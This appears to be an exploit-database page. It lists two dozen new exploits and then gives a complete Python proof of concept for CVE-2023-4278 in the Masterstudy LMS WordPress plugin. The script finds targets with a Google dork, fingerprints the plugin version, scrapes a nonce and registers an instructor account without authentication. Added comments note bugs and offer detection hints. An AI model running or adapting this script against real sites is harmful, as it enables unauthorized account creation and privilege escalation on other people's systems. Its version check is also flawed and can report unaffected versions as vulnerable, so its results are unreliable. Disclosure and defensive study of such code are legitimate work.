
24 changes to exploits/shellcodes/ghdb Minio 2022-07-29T19-40-48Z - Path traversal Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Atcom 2.7.x.x - Authenticated Command Injection Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE) Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction OpenPLC WebServer 3 - Denial of Service Splunk 9.0.5 - admin account take over BoidCMS v2.0.0 - authenticated file upload vulnerability Cacti 1.2.24 - Authenticated command injection when using SNMP options Chitor-CMS v1.1.2 - Pre-Auth SQL Injection Clcknshop 1.0.0 - SQL Injection Coppermine Gallery 1.6.25 - RCE Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) GLPI GZIP(Py3) 9.4.5 - RCE Limo Booking Software v1.0 - CORS Media Library Assistant Wordpress Plugin - RCE and LFI Online ID Generator 1.0 - Remote Code Execution (RCE) Shuttle-Booking-Software v1.0 - Multiple-SQLi Webedition CMS v2.9.8.8 - Blind SSRF WEBIGniter v28.7.23 File Upload - Remote Code Execution Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation Wordpress Sonaar Music Plugin 4.7 - Stored XSS Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
|
|
# Google Dork: inurl:/user-public-account
|
|
# Date: 2023-09-04
|
|
# Exploit Author: Revan Arifio
|
|
# Vendor Homepage: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
|
|
# Version: <= 3.0.17
|
|
# Tested on: Windows, Linux
|
|
# CVE : CVE-2023-4278
|
|
|
|
import requests
|
|
import os
|
|
import re
|
|
import time
|
|
|
|
# ASCII-art banner shown once at start-up. It is purely cosmetic: nothing
# below reads it, and it has no effect on the requests the script sends.
# (The art is a plain triple-quoted string, so the backslashes inside it are
# taken literally apart from Python's invalid-escape warnings.)
banner = """
_______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
\_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/

======================================================================================================
|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|| Author : https://github.com/revan-ar ||
|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
|| Support : https://www.buymeacoffee.com/revan.ar ||
======================================================================================================

"""

print(banner)
|
|
|
|
# get nonce
|
|
def get_nonce(target):
    """Fetch the plugin's public-account page and extract the ``stm_lms_register`` nonce.

    The page at ``<target>/user-public-account`` is requested without any
    authentication and the nonce is pulled out of the response body with a
    regular expression. Defensive note: an unauthenticated GET of this page
    followed by a POST to ``admin-ajax.php?action=stm_lms_register`` (see
    privesc()) is the request pair this script produces.

    Args:
        target: Base URL of the WordPress site, scheme included; it is
            formatted straight into the request URL with no validation.

    Returns:
        The captured nonce as a str (possibly the empty string, since the
        pattern is ``(.*?)``) when the pattern matched.

    Raises:
        TypeError: when the pattern is absent from the page — see the note
            below; this is raised implicitly, not deliberately.
    """
    open_target = requests.get("{}/user-public-account".format(target))
    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
    # NOTE(review): re.search() returns None on no match, so subscripting it
    # raises TypeError before the comparison runs. When it *did* match,
    # search_nonce[1] is always a str (never None), so the else branch below
    # is effectively unreachable and the "Failed" message is never printed.
    if search_nonce[1] != None:
        return search_nonce[1]
    else:
        print("Failed when getting Nonce :p")
|
|
|
|
|
|
|
|
# privilege escalation
|
|
def privesc(target, nonce, username, password, email):
    """Send the plugin's registration AJAX request with ``become_instructor`` set.

    Builds the JSON body the ``stm_lms_register`` handler expects and POSTs it
    to ``admin-ajax.php`` together with the nonce obtained by get_nonce().
    The exploit title states that affected versions (<= 3.0.17, per the file
    header) accept this without authentication; the request itself carries
    no session cookie.

    Defensive note: a POST to ``/wp-admin/admin-ajax.php?action=stm_lms_register``
    whose JSON body has ``"become_instructor": true`` and comes from an
    unauthenticated client is the thing to alert on; the mitigation named by
    the header is updating the plugin beyond 3.0.17.

    Args:
        target: Base URL of the WordPress site, scheme included.
        nonce: Value of the ``stm_lms_register`` nonce scraped from the site.
        username: Login name for the account being requested.
        password: Password for the account (sent twice, as the form expects).
        email: E-mail address for the account.

    Returns:
        None. The outcome is only printed, never returned.
    """

    req_data = {
        "user_login":"{}".format(username),
        "user_email":"{}".format(email),
        "user_password":"{}".format(password),
        "user_password_re":"{}".format(password),
        # The instructor role is requested alongside an ordinary registration;
        # this flag is what the vulnerability in the title is about.
        "become_instructor":True,
        "privacy_policy":True,
        # Remaining profile fields are sent empty; the handler's required set
        # is not visible here — presumably these are optional, verify.
        "degree":"",
        "expertize":"",
        "auditory":"",
        "additional":[],
        "additional_instructors":[],
        "profile_default_fields_for_register":[],
        "redirect_page":"{}/user-account/".format(target)
    }

    # Nonce travels in the query string, the form data as a JSON body.
    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)

    # NOTE(review): only the HTTP status is inspected. admin-ajax.php handlers
    # commonly answer 200 even when they reject the submission, so "Success"
    # here means "the server accepted the request", not a confirmed account;
    # the response body is never examined.
    if start.status_code == 200:
        print("[+] Exploit Success !!")
    else:
        print("[+] Exploit Failed :p")
|
|
|
|
|
|
|
|
# URL target
|
|
# Interactive driver: fingerprint the plugin version, fetch the nonce, then
# send the registration request. Every value is read from stdin unvalidated;
# `target` must already carry the scheme because it is formatted directly
# into URLs.
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
# Version fingerprint via the plugin's world-readable readme.txt, which
# carries a "Stable tag:" line. Defensive note: unauthenticated reads of
# plugin readme files are a cheap, low-noise signal of enumeration.
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
# NOTE(review): plugin_version is None when the readme is missing or lacks a
# "Stable tag:" line, so the subscript below raises TypeError.
int_version = plugin_version[1].replace(".", "")
time.sleep(1)

# NOTE(review): the version is compared as its digits concatenated
# ("3.0.17" -> 3017; the 3018 threshold corresponds to 3.0.18). Because the
# components are collapsed, a version such as "3.1.0" -> 310 also compares
# as < 3018 and is reported vulnerable although it lies outside the stated
# affected range (<= 3.0.17).
if int(int_version) < 3018:
    print("[+] Target is Vulnerable !!")
    # Credentials for the account the script will try to register
    email = input("[+] Email: ")
    username = input("[+] Username: ")
    password = input("[+] Password: ")
    time.sleep(1)
    print("[+] Getting Nonce...")
    # NOTE(review): this rebinds the module-level name `get_nonce` from the
    # function to its str result; any later call to get_nonce() would fail.
    get_nonce = get_nonce(target)
    # Proceed only when a nonce came back (on a regex miss get_nonce() raises
    # instead of returning None, so this guard rarely triggers)
    if get_nonce != None:
        print("[+] Success Getting Nonce: {}".format(get_nonce))
        time.sleep(1)
        # Send the registration request
        privesc(target, get_nonce, username, password, email)
    # ----------------------------------

else:
    print("[+] Target is NOT Vulnerable :p")